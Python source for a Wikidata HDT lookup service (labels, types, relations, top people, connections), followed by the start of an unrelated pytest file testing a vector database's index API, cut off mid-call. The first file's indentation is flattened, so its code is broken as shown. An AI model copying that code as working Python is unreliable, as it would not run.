# limitations under the License.
import datetime
import itertools
import json
import os
import re
import multiprocessing as mp
import logging
from typing import List, Tuple, Dict, Any
import sentry_sdk
from hdt import HDTDocument
from common.wiki_skill import used_types as wiki_skill_used_types
sentry_sdk.init(os.getenv("SENTRY_DSN"))
logging.basicConfig(format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.DEBUG)
log = logging.getLogger(__name__)
prefixes = {
"entity": "http://we",
"label": "http://wl",
"alias": "http://wal",
"description": "http://wd",
"rels": {"direct": "http://wpd", "no_type": "http://wp", "statement": "http://wps", "qualifier": "http://wpq"},
"statement": "http://ws",
}
max_comb_num = 1e6
lang = "@en"
wiki_filename = "/root/.deeppavlov/downloads/wikidata/wikidata_lite.hdt"
document = HDTDocument(wiki_filename)
USE_CACHE = True
ANIMALS_SKILL_TYPES = {"Q55983715", "Q16521", "Q43577", "Q39367", "Q38547"}
occ = {
"business": [["Q131524", "enterpreneur"]],
"sport": [
["Q937857", "football player"],
["Q2066131", "athlete"],
["Q3665646", "basketball player"],
["Q10833314", "tennis player"],
["Q19204627", "american football player"],
],
"films": [
["Q10800557", "film actor"],
["Q33999", "actor"],
["Q10798782", "television actor"],
["Q2526255", "film director"],
],
"music": [
["Q488205", "singer-songwriter"],
["Q36834", "composer"],
["Q177220", "singer"],
["Q753110", "songwriter"],
],
"literature": [["Q49757", "poet"], ["Q6625963", "novelist"], ["Q214917", "playwright"], ["Q36180", "writer"]],
"politics": [["Q82955", "politician"], ["Q372436", "statesperson"]],
}
top_n = 10
def find_top_people():
top_people = {}
for domain in occ:
occupations = occ[domain]
occ_people = []
for elem, elem_label in occupations:
tr, cnt = document.search_triples("", "http://wpd/P106", f"http://we/{elem}")
for triplet in tr:
occ_people.append(triplet[0])
people_with_cnt = []
for man in occ_people:
tr, cnt = document.search_triples(f"{man}", "", "")
people_with_cnt.append((man, cnt))
people_with_cnt = sorted(people_with_cnt, key=lambda x: x[1], reverse=True)
people_with_labels = []
for man, counts in people_with_cnt[:top_n]:
label = ""
tr, cnt = document.search_triples(f"{man}", "http://wl", "")
for triplet in tr:
if triplet[2].endswith("@en"):
label = triplet[2].replace("@en", "").replace('"', "")
break
if label:
people_with_labels.append([man, label])
top_people[domain] = people_with_labels
for domain in occ:
occupations = occ[domain]
for elem, elem_label in occupations:
occ_people = []
tr, cnt = document.search_triples("", "http://wpd/P106", f"http://we/{elem}")
for triplet in tr:
occ_people.append(triplet[0])
people_with_cnt = []
for man in occ_people:
tr, cnt = document.search_triples(f"{man}", "", "")
people_with_cnt.append((man, cnt))
people_with_cnt = sorted(people_with_cnt, key=lambda x: x[1], reverse=True)
people_with_labels = []
for man, counts in people_with_cnt[:top_n]:
label = ""
tr, cnt = document.search_triples(f"{man}", "http://wl", "")
for triplet in tr:
if triplet[2].endswith("@en"):
label = triplet[2].replace("@en", "").replace('"', "")
break
if label:
people_with_labels.append([man, label])
top_people[elem_label] = people_with_labels
return top_people
topic_skill_types = {
"Q36180", # writer
"Q49757", # poet
"Q214917", # playwright
"Q1930187", # journalist
"Q6625963", # novelist
"Q28389", # screenwriter
"Q571", # book
"Q277759", # book series
"Q8261", # novel
"Q47461344", # written work
"Q7725634", # literary work
"Q1667921", # novel series
"Q33999", # actor
"Q177220", # singer
"Q17125263", # youtuber
"Q245068", # comedian
"Q947873", # television presenter
"Q10800557", # film actor
"Q10798782", # television actor
"Q2405480", # voice actor
"Q211236", # celebrity
"Q82955", # politician
"Q372436", # statesperson
"Q488205", # singer-songwriter
"Q36834", # composer
"Q177220", # singer
"Q753110", # songwriter
"Q134556", # single
"Q7366", # song
"Q482994", # album
"Q2066131", # athlete
"Q937857", # football player
"Q4009406", # sprinter
"Q10843402", # swimmer
"Q10873124", # chess player
"Q3665646", # basketball player
"Q10833314", # tennis player
"Q19204627", # American football player
"Q10871364", # baseball player
"Q20639856", # team
"Q847017", # sports club
"Q476028", # football club
"Q4498974", # ice hockey team
"Q570116", # tourist attraction
"Q11424", # film
"Q24856", # film series
"Q82955", # politician
}
def search(query: List[str], unknown_elem_positions: List[Tuple[int, str]]) -> List[Dict[str, str]]:
query = list(map(lambda elem: "" if elem.startswith("?") else elem, query))
subj, rel, obj = query
combs = []
triplets, cnt = document.search_triples(subj, rel, obj)
if cnt < max_comb_num:
if rel == prefixes["description"]:
triplets = [triplet for triplet in triplets if triplet[2].endswith(lang)]
combs = [{elem: triplet[pos] for pos, elem in unknown_elem_positions} for triplet in triplets]
else:
log.debug("max comb num exceeds")
return combs
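# Illustrative call (results depend on the loaded HDT file): query elements
# starting with "?" are unknowns, and unknown_elem_positions maps triple
# positions (0=subj, 1=rel, 2=obj) to the keys of the returned dicts.
def _example_search():
    # "for Lake Baikal (Q5513), which country (P17) is it located in?"
    return search(
        [f"{prefixes['entity']}/Q5513", f"{prefixes['rels']['direct']}/P17", "?country"],
        [(2, "country")],
    )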
def format_date(entity, question):
date_info = re.findall(r"([\d]{3,4})-([\d]{1,2})-([\d]{1,2})", entity)
if date_info:
year, month, day = date_info[0]
if "how old" in question.lower():
entity = datetime.datetime.now().year - int(year)
elif day != "00":
date = datetime.datetime.strptime(f"{year}-{month}-{day}", "%Y-%m-%d")
entity = date.strftime("%d %B %Y")
else:
entity = year
return entity
entity = entity.lstrip("+-")
return entity
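# Illustrative behavior (as implemented above):
#   format_date('"1799-06-06T00:00:00Z"', "when was he born") -> "06 June 1799"
#   format_date('"1799-06-06T00:00:00Z"', "how old is he")    -> current year - 1799
#   format_date("+1642", "")                                  -> "1642" (sign stripped)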
def find_label(entity: str, question: str) -> str:
entity = str(entity).replace('"', "")
if entity.startswith("Q") or entity.startswith("P"):
# example: "Q5513"
entity = f"{prefixes['entity']}/{entity}"
# "http://www.wikidata.org/entity/Q5513"
if entity.startswith(prefixes["entity"]):
labels, c = document.search_triples(entity, prefixes["label"], "")
# labels = [["http://www.wikidata.org/entity/Q5513", "http://www.w3.org/2000/01/rdf-schema#label",
# '"Lake Baikal"@en'], ...]
for label in labels:
if label[2].endswith(lang):
                found_label = (
                    label[2].strip(lang).replace('"', "").replace(".", " ").replace("$", " ").replace("\xa0", " ")  # "\xa0": non-breaking space
                )
return found_label
elif entity.endswith(lang):
# entity: '"Lake Baikal"@en'
        entity = entity[:-3].replace(".", " ").replace("$", " ").replace("\xa0", " ")  # "\xa0": non-breaking space
return entity
elif "^^" in entity:
"""
examples:
'"1799-06-06T00:00:00Z"^^<http://www.w3.org/2001/XMLSchema#dateTime>' (date)
'"+1642"^^<http://www.w3.org/2001/XMLSchema#decimal>' (number)
"""
entity = entity.split("^^")[0]
for token in ["T00:00:00Z", "+"]:
entity = entity.replace(token, "")
entity = format_date(entity, question).replace(".", "").replace("$", "")
return entity
elif entity.isdigit():
entity = str(entity).replace(".", ",")
return entity
return "Not Found"
def find_alias(entity: str) -> List[str]:
aliases = []
if entity.startswith(prefixes["entity"]):
labels, cardinality = document.search_triples(entity, prefixes["alias"], "")
aliases = [label[2].strip(lang).strip('"') for label in labels if label[2].endswith(lang)]
return aliases
def find_rels(entity: str, direction: str, rel_type: str = "no_type", save: bool = False) -> List[str]:
rels = []
if not rel_type:
rel_type = "direct"
if direction == "forw":
query = [f"{prefixes['entity']}/{entity}", "", ""]
else:
query = ["", "", f"{prefixes['entity']}/{entity}"]
triplets, c = document.search_triples(*query)
start_str = f"{prefixes['rels'][rel_type]}/P"
rels = {triplet[1] for triplet in triplets if triplet[1].startswith(start_str)}
rels = list(rels)
return rels
def find_object(entity: str, rel: str, direction: str) -> List[str]:
objects = []
if not direction:
direction = "forw"
entity = f"{prefixes['entity']}/{entity.split('/')[-1]}"
rel = f"{prefixes['rels']['direct']}/{rel}"
if direction == "forw":
triplets, cnt = document.search_triples(entity, rel, "")
if cnt < max_comb_num:
objects.extend([triplet[2].split("/")[-1] for triplet in triplets])
else:
triplets, cnt = document.search_triples("", rel, entity)
if cnt < max_comb_num:
objects.extend([triplet[0].split("/")[-1] for triplet in triplets])
return objects
def check_triplet(subj: str, rel: str, obj: str) -> bool:
subj = f"{prefixes['entity']}/{subj}"
rel = f"{prefixes['rels']['direct']}/{rel}"
obj = f"{prefixes['entity']}/{obj}"
    triplets, cnt = document.search_triples(subj, rel, obj)
    return cnt > 0
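# Illustrative call (ids hedged; truth depends on the loaded dump):
#   check_triplet("Q5513", "P17", "Q159")  # is Lake Baikal in Russia? -> True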
def find_types(entity: str):
types = []
if not entity.startswith("http"):
entity = f"{prefixes['entity']}/{entity}"
tr, c = document.search_triples(entity, f"{prefixes['rels']['direct']}/P31", "")
types = [triplet[2].split("/")[-1] for triplet in tr]
if "Q5" in types:
tr, c = document.search_triples(entity, f"{prefixes['rels']['direct']}/P106", "")
types += [triplet[2].split("/")[-1] for triplet in tr]
types = list(set(types))
return types
def find_subclasses(entity: str):
if not entity.startswith("http"):
entity = f"{prefixes['entity']}/{entity}"
tr, c = document.search_triples(entity, f"{prefixes['rels']['direct']}/P279", "")
subclasses = [triplet[2].split("/")[-1] for triplet in tr]
subclasses = list(set(subclasses))
return subclasses
def find_types_2hop(entity: str):
types_1hop = find_types(entity)
types_2hop_list = []
for tp in types_1hop:
if tp != "Q5":
types_2hop = find_types(tp) + find_subclasses(tp)
types_2hop_list += types_2hop
types_list = types_2hop_list + types_1hop
types_list = list(set(types_list))
return types_list
def find_objects_info(objects, num_objects=25):
objects_info = []
for obj in objects[:num_objects]:
obj_label = find_label(obj, "")
if obj_label and obj_label not in {"Not Found", "anonymous"}:
objects_info.append((obj, obj_label))
return objects_info
def find_intersection(entity1, entity2, rel, direction):
if direction == "backw":
tr1, cnt1 = document.search_triples("", f"http://wpd/{rel}", f"http://we/{entity1}")
tr2, cnt2 = document.search_triples("", f"http://wpd/{rel}", f"http://we/{entity2}")
ind = 0
else:
tr1, cnt1 = document.search_triples(f"http://we/{entity1}", f"http://wpd/{rel}", "")
tr2, cnt2 = document.search_triples(f"http://we/{entity2}", f"http://wpd/{rel}", "")
ind = 2
elem1 = set([triplet[ind] for triplet in tr1])
elem2 = set([triplet[ind] for triplet in tr2])
elements = elem1.intersection(elem2)
info = []
if elements:
for elem in elements:
label = find_label(elem, "")
if label:
info.append(label)
break
return info
def find_connection(person1, person2):
rel_info = [
("P161", "films", "backw"),
("P175", "songs", "backw"),
("P50", "books", "backw"),
("P102", "party", "forw"),
("P54", "team", "forw"),
]
entities1 = [(entity_id, n) for n, entity_id in enumerate(person1)]
entities2 = [(entity_id, n) for n, entity_id in enumerate(person2)]
entity_pairs = list(itertools.product(entities1, entities2))
entity_pairs = sorted(entity_pairs, key=lambda x: sum([elem[1] for elem in x]))
entity_pairs = [[elem[0] for elem in entity_pair] for entity_pair in entity_pairs]
connection = ""
info = []
for entity1, entity2 in entity_pairs[:4]:
info = []
tr, cnt1 = document.search_triples(f"http://we/{entity1}", "http://wpd/P26", f"http://we/{entity2}")
tr, cnt2 = document.search_triples(f"http://we/{entity2}", "http://wpd/P26", f"http://we/{entity1}")
if cnt1 or cnt2:
connection = "spouse"
break
tr, cnt1 = document.search_triples(f"http://we/{entity1}", "http://wpd/P451", f"http://we/{entity2}")
tr, cnt2 = document.search_triples(f"http://we/{entity2}", "http://wpd/P451", f"http://we/{entity1}")
if cnt1 or cnt2:
connection = "partner"
break
for rel, conn, direction in rel_info:
info = find_intersection(entity1, entity2, rel, direction)
if info:
connection = conn
break
if info:
break
return connection, info
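# Illustrative behavior (results depend on the HDT dump): given two ranked
# lists of candidate ids, pairs are scanned in rank order and the function
# returns e.g. ("spouse", []) when a P26 link exists in either direction, or
# ("films", [<shared film label>]) when both share a P161 "cast member" edge.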
def extract_info():
art_genres = [
["film", "Q201658", "P136", ["Q11424"], "actor", "P161"],
["tv series", "Q15961987", "P136", ["Q5398426"], "tv actor", "P161"],
["song", "Q188451", "P136", ["Q134556", "Q7366"], "", ""],
["singer", "Q188451", "P136", ["Q488205", "Q36834", "Q177220", "Q753110"], "", ""],
["album", "Q188451", "P136", ["Q482994", "Q208569"], "", ""],
["book", "Q223393", "P136", ["Q7725634"], "writer", "P50"],
["athlete", "Q31629", "P641", ["Q5", "Q2066131"], "", ""],
["team", "Q31629", "P641", ["Q20639856", "Q12973014"], "", ""],
]
art_genres_dict = {}
people_genres_dict = {}
banned_types = {"Q82955", "Q372436"}
for art_type, genre_type, genre_rel, types, occupation, rel in art_genres:
genres_list = find_object(genre_type, "P31", "backw")
genre_labels_list = find_objects_info(genres_list, num_objects=200)
genre_dict = {}
people_dict = {}
for genre, genre_label in genre_labels_list:
art_objects = find_object(genre, genre_rel, "backw")
filtered_art_objects = []
for obj in art_objects:
obj_types = find_types_2hop(obj)
if set(types).intersection(obj_types) and not set(banned_types).intersection(obj_types):
filtered_art_objects.append(obj)
art_objects = filtered_art_objects
art_objects_with_scores = []
delete_words = [" film", " music"]
for word in delete_words:
if genre_label.endswith(word):
length = len(word)
genre_label = genre_label[:-length]
people_list = []
for obj in art_objects:
tr, cnt = document.search_triples(f"http://we/{obj}", "", "")
art_objects_with_scores.append((obj, cnt))
if occupation:
people = find_object(obj, rel, "forw")
people_list += people
if occupation:
people_with_scores = []
for man in people_list:
tr, cnt = document.search_triples(f"http://we/{man}", "", "")
people_with_scores.append((man, cnt))
people_with_scores = list(set(people_with_scores))
people_with_scores = sorted(people_with_scores, key=lambda x: x[1], reverse=True)
people_list = [man for man, score in people_with_scores]
people_labels = find_objects_info(people_list[:15])
if people_labels:
people_dict[genre_label] = people_labels
art_objects_with_scores = sorted(art_objects_with_scores, key=lambda x: x[1], reverse=True)
art_objects = [obj for obj, score in art_objects_with_scores]
art_objects_labels = find_objects_info(art_objects[:15])
if art_objects_labels:
genre_dict[genre_label] = art_objects_labels
art_genres_dict[art_type] = genre_dict
if occupation:
people_genres_dict[occupation] = people_dict
return art_genres_dict, people_genres_dict
def find_top_triplets(entity, entity_substr, pos=None, token_conf=None, conf=None):
triplets_info = {}
if entity.startswith("Q"):
triplets = {}
entity_label = find_label(entity, "")
triplets["plain_entity"] = entity
for rel_id, rel_label in [
("P31", "instance of"),
("P279", "subclass of"),
("P131", "located in"),
("P106", "occupation"),
("P361", "part of"),
("P17", "country"),
("P27", "country of sitizenship"),
("P569", "date of birth"),
("P1542", "has effect"),
("P580", "start time"),
("P1552", "has quality"),
("P50", "author"),
("P136", "genre"),
("P577", "publication date"),
("P800", "notable work"),
("P463", "musical group"),
("P1303", "instrument"),
("P166", "awards received"),
("P571", "inception"),
("P175", "performer"),
("P658", "tracklist"),
("P641", "sport"),
("P54", "member of sport team"),
("P1532", "country for sport"),
("P413", "position played on team"),
("P1344", "participant in"),
("P1449", "nickname"),
("P286", "head coach"),
("P118", "league"),
("P115", "home venue"),
("P2522", "victory"),
("P6364", "official color or colors"),
("P206", "located next to body of water"),
("P840", "narrative location"),
("P1830", "owner of"),
("P102", "member of political party"),
("P26", "spouse"),
("P451", "partner"),
]:
objects = find_object(entity, rel_id, "")
objects_info = find_objects_info(objects)
if rel_label == "occupation":
is_sportsman = any(
[{"Q2066131", "Q18536342"}.intersection(set(find_subclasses(occ))) for occ in objects]
)
if is_sportsman:
objects_info.append(["Q2066131", "athlete"])
if objects_info:
triplets[rel_label] = objects_info
songs = find_object(entity, "P175", "backw")
songs_with_labels = find_objects_info(songs)
if songs_with_labels:
triplets["songs of singer"] = songs_with_labels
players = find_object(entity, "P54", "backw")
players_with_labels = find_objects_info(players)
if players_with_labels:
triplets["players list"] = players_with_labels
entity_types = set(find_types(entity) + find_subclasses(entity))
if entity_types.intersection({"Q188451"}): # music genre
if entity_substr in genres_dict["singer"]:
triplets["top singers"] = genres_dict["singer"][entity_substr]
else:
for genre in genres_dict["singer"]:
if genre in entity_substr or entity_substr in genre:
triplets["top singers"] = genres_dict["singer"][genre]
if entity_substr in genres_dict["song"]:
triplets["top songs"] = genres_dict["song"][entity_substr]
else:
for genre in genres_dict["song"]:
if genre in entity_substr or entity_substr in genre:
triplets["top songs"] = genres_dict["song"][genre]
if entity_types.intersection({"Q31629", "Q4356073", "Q212434"}): # type of sport
if entity_substr in genres_dict["athlete"]:
triplets["top athletes"] = genres_dict["athlete"][entity_substr]
else:
for sport in genres_dict["athlete"]:
if sport in entity_substr or entity_substr in sport:
triplets["top athletes"] = genres_dict["athlete"][sport]
if entity_substr in genres_dict["team"]:
triplets["top teams"] = genres_dict["team"][entity_substr]
else:
for sport in genres_dict["team"]:
if sport in entity_substr or entity_substr in sport:
triplets["top teams"] = genres_dict["team"][sport]
triplets["entity_label"] = entity_label
occupations = triplets.get("occupation", [])
if occupations:
occupation_titles = set([occ_title for occ_id, occ_title in occupations])
if {"actor", "film actor", "television actor"}.intersection(occupation_titles):
objects = find_object(entity, "P161", "backw")
objects_info = find_objects_info(objects)
if objects_info:
triplets["films of actor"] = objects_info
if {"singer", "songwriter", "composer"}.intersection(occupation_titles):
objects = find_object(entity, "P175", "backw")
albums = [entity for entity in objects if "Q482994" in find_types(entity)]
songs = [entity for entity in objects if "Q134556" in find_types(entity)]
albums_info = find_objects_info(albums)
if albums_info:
triplets["albums"] = albums_info
songs_info = find_objects_info(songs)
if songs_info:
triplets["songs"] = songs_info
birth_date = find_object(entity, "P569", "")
if birth_date:
date_info = re.findall(r"([\d]{3,4})-([\d]{1,2})-([\d]{1,2})", birth_date[0])
if date_info:
year, month, day = date_info[0]
age = datetime.datetime.now().year - int(year)
triplets["age"] = age
types_2hop = find_types_2hop(entity)
types_2hop_with_labels = find_objects_info(types_2hop)
triplets["types_2hop"] = types_2hop_with_labels
if pos is not None:
triplets["pos"] = pos
if token_conf is not None:
triplets["token_conf"] = token_conf
if conf is not None:
triplets["conf"] = conf
triplets_info[entity_substr] = triplets
return triplets_info
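# Sketch of the structure returned by find_top_triplets (the entity substring,
# QIDs and values below are hypothetical, shown only to illustrate the layout
# the code above builds):
#   {"adele": {"occupation": [["Q177220", "singer"]],
#              "songs of singer": [["Q123456789", "some song"]],
#              "entity_label": "Adele", "age": 35,
#              "types_2hop": [["Q123456789", "some type"]],
#              "pos": 0, "token_conf": 1.0, "conf": 1.0}}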
def filter_by_types(objects, types):
filtered_objects = []
for obj in objects:
found_types = find_types(obj)
if set(found_types).intersection(types):
filtered_objects.append(obj)
return filtered_objects
def find_objects_by_category(what_to_find, category, subject):
objects = []
if category == "movie" and what_to_find == "actors":
objects = find_object(subject, "P161", "forw")
elif category == "show" and what_to_find == "actors":
objects = find_object(subject, "P161", "forw")
elif category == "show" and what_to_find == "episodes":
objects = find_object(subject, "P179", "backw")
elif category == "singer" and what_to_find == "songs":
objects = find_object(subject, "P175", "backw")
objects = filter_by_types(objects, {"Q134556", "Q7366"})
elif category == "singer" and what_to_find == "albums":
objects = find_object(subject, "P175", "backw")
objects = filter_by_types(objects, {"Q482994", "Q208569"})
elif category == "music" and what_to_find == "songs":
objects = find_object(subject, "P175", "backw")
objects = filter_by_types(objects, {"Q134556", "Q7366"})
elif category == "music" and what_to_find == "albums":
objects = find_object(subject, "P175", "backw")
objects = filter_by_types(objects, {"Q482994", "Q208569"})
elif category == "music" and what_to_find == "singers":
objects = find_object(subject, "P175", "backw")
objects = filter_by_types(objects, {"Q488205", "Q36834", "Q177220", "Q753110"})
else:
pass
objects_with_labels = find_objects_info(objects[:20])
return objects_with_labels
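# Usage sketch (the subject QID below is a hypothetical placeholder): fetch up
# to 20 songs performed by a singer entity, i.e. P175 "performer" traversed
# backwards and filtered to song/single types:
#   songs_with_labels = find_objects_by_category("songs", "singer", "Q123456789")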
if USE_CACHE:
with open("/root/.deeppavlov/downloads/wikidata/wikidata_cache.json", "r") as fl:
wikidata_cache = json.load(fl)
top_people = wikidata_cache["top_people"]
genres_dict = wikidata_cache["genres_dict"]
people_genres_dict = wikidata_cache["people_genres_dict"]
else:
top_people = find_top_people()
genres_dict, people_genres_dict = extract_info()
manager = mp.Manager()
def execute_queries_list(parser_info_list: List[str], queries_list: List[Any], utt_num: int, wiki_parser_output):
for parser_info, query in zip(parser_info_list, queries_list):
if parser_info == "find_rels":
rels = []
try:
rels = find_rels(*query)
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output += rels
elif parser_info == "find_top_triplets":
triplets_info = {}
topic_skills_triplets_info = {}
wiki_skill_triplets_info = {}
animals_skill_triplets_info = {}
try:
for entity_info in query:
if entity_info:
entity_substr = entity_info.get("entity_substr", "")
entity_ids = entity_info.get("entity_ids", [])
tokens_match_conf_list = entity_info.get("tokens_match_conf", [1.0])
confidences = entity_info.get("confidences", [1.0])
if entity_ids:
entity_triplets_info = find_top_triplets(
entity_ids[0], entity_substr, 0, tokens_match_conf_list[0], confidences[0]
)
triplets_info = {**triplets_info, **entity_triplets_info}
found_topic_skills_info = False
found_wiki_skill_info = False
for n, (entity, token_conf, conf) in enumerate(
zip(entity_ids, tokens_match_conf_list, confidences)
):
types = find_types(entity)
types_2hop = find_types_2hop(entity)
if not found_topic_skills_info and (
set(types).intersection(topic_skill_types)
or set(types_2hop).intersection(topic_skill_types)
):
entity_triplets_info = find_top_triplets(entity, entity_substr, n, token_conf, conf)
topic_skills_triplets_info = {**topic_skills_triplets_info, **entity_triplets_info}
if not set(types_2hop).intersection({"Q11424", "Q24856"}):
found_topic_skills_info = True
if not found_wiki_skill_info and (
set(types).intersection(wiki_skill_used_types)
or set(types_2hop).intersection(wiki_skill_used_types)
):
entity_triplets_info = find_top_triplets(entity, entity_substr, n, token_conf, conf)
wiki_skill_triplets_info = {**wiki_skill_triplets_info, **entity_triplets_info}
if not set(types_2hop).intersection({"Q11424", "Q24856"}):
found_wiki_skill_info = True
if found_topic_skills_info and found_wiki_skill_info:
break
for n, (entity, token_conf, conf) in enumerate(
zip(entity_ids, tokens_match_conf_list, confidences)
):
types = find_types(entity)
types_2hop = find_types_2hop(entity)
if set(types).intersection(ANIMALS_SKILL_TYPES) or set(types_2hop).intersection(
ANIMALS_SKILL_TYPES
):
entity_triplets_info = find_top_triplets(entity, entity_substr, n, token_conf, conf)
animals_skill_triplets_info = {**animals_skill_triplets_info, **entity_triplets_info}
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(
{
"entities_info": triplets_info,
"topic_skill_entities_info": topic_skills_triplets_info,
"wiki_skill_entities_info": wiki_skill_triplets_info,
"animals_skill_entities_info": animals_skill_triplets_info,
"utt_num": utt_num,
}
)
elif parser_info == "find_top_people":
top_people_list = []
try:
for occ in query:
if occ in top_people:
top_people_list.append(top_people[occ])
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(top_people_list)
elif parser_info == "find_connection":
conn_info = []
try:
entities1, entities2 = query
conn_info = list(find_connection(entities1, entities2))
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(conn_info)
elif parser_info == "find_topic_info":
objects = []
try:
if "genre" in query and "category" in query:
genre = query["genre"]
category = query["category"]
if category in {"actor", "singer", "tv actor", "writer"}:
if category in people_genres_dict and genre in people_genres_dict[category]:
objects = people_genres_dict[category][genre]
else:
if category in genres_dict and genre in genres_dict[category]:
objects = genres_dict[category][genre]
elif "what_to_find" in query and "category" in query and "subject" in query:
what_to_find = query["what_to_find"]
category = query["category"]
subject = query["subject"]
objects = find_objects_by_category(what_to_find, category, subject)
else:
log.debug("unsupported query type")
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(objects)
elif parser_info == "find_object":
objects = []
try:
objects = find_object(*query)
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(objects)
elif parser_info == "check_triplet":
check_res = False
try:
check_res = check_triplet(*query)
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(check_res)
elif parser_info == "find_label":
label = ""
try:
label = find_label(*query)
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(label)
elif parser_info == "find_types":
types = []
try:
types = find_types(query)
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(types)
elif parser_info == "find_triplets":
triplets = []
try:
triplets_forw, c = document.search_triples(f"{prefixes['entity']}/{query}", "", "")
triplets.extend(
[triplet for triplet in triplets_forw if not triplet[2].startswith(prefixes["statement"])]
)
triplets_backw, c = document.search_triples("", "", f"{prefixes['entity']}/{query}")
triplets.extend(
[triplet for triplet in triplets_backw if not triplet[0].startswith(prefixes["statement"])]
)
except Exception as e:
log.info("Wrong arguments are passed to wiki_parser")
sentry_sdk.capture_exception(e)
log.exception(e)
wiki_parser_output.append(list(triplets))
else:
raise ValueError(f"Unsupported query type {parser_info}")
def wp_call(parser_info_list: List[str], queries_list: List[Any], utt_num: int) -> List[Any]:
wiki_parser_output = manager.list()
p = mp.Process(target=execute_queries_list, args=(parser_info_list, queries_list, utt_num, wiki_parser_output))
p.start()
p.join()
return list(wiki_parser_output)
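# Usage sketch: wp_call executes one batch of queries in a short-lived child
# process (presumably so that a crash or memory spike inside the wikidata
# lookups cannot take down the main service) and returns the results collected
# through the manager list. The arguments below are hypothetical:
#   output = wp_call(["find_types"], ["Q123456789"], utt_num=0)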
|
test_index.py
|
import pytest
from base.client_base import TestcaseBase
from base.index_wrapper import ApiIndexWrapper
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import CollectionErrorMessage as clem
from common.code_mapping import IndexErrorMessage as iem
from utils.utils import *
from common.constants import *
prefix = "index"
default_schema = cf.gen_default_collection_schema()
default_field_name = ct.default_float_vec_field_name
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
# copied from pymilvus
uid = "test_index"
BUILD_TIMEOUT = 300
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
# query = gen_search_vectors_params(field_name, default_entities, default_top_k, 1)
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
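# Note: for IVF indexes, "nlist" is the number of clusters built at index time;
# searches then probe a subset of them (the "nprobe" search param produced by
# get_search_param), trading recall for latency.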
class TestIndexParams(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("collection", [None, "coll"])
def test_index_non_collection(self, collection):
"""
target: test index with None collection
method: input none collection object
expected: raise exception
"""
self._connect()
self.index_wrap.init_index(collection, default_field_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: clem.CollectionType})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("field_name", ct.get_invalid_strs)
def test_index_field_name_invalid(self, field_name):
"""
target: test index with error field name
method: input field name
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
log.error(iem.WrongFieldName % str(field_name))
self.index_wrap.init_index(collection_w.collection, field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: iem.WrongFieldName % str(field_name)})
@pytest.mark.tags(CaseLabel.L1)
def test_index_field_name_not_existed(self):
"""
target: test index with error field name
method: input field name not created
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
f_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, f_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: f"cannot create index on non-existed field: {f_name}"})
@pytest.mark.tags(CaseLabel.L0)
# TODO (reason="pymilvus issue #677", raises=TypeError)
@pytest.mark.parametrize("index_type", ct.get_invalid_strs)
def test_index_type_invalid(self, index_type):
"""
target: test index with error index type
method: input invalid index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = index_type
if not isinstance(index_params["index_type"], str):
msg = "must be str"
else:
msg = "Invalid index_type"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: msg})
@pytest.mark.tags(CaseLabel.L1)
def test_index_type_not_supported(self):
"""
target: test index with error index type
method: input unsupported index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = "IVFFFFFFF"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_invalid(self, get_invalid_index_params):
"""
target: test index with error index params
method: input invalid index params
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = get_invalid_index_params
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_invalid(self, get_invalid_index_name):
"""
target: test index with error index name
method: input invalid index name
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
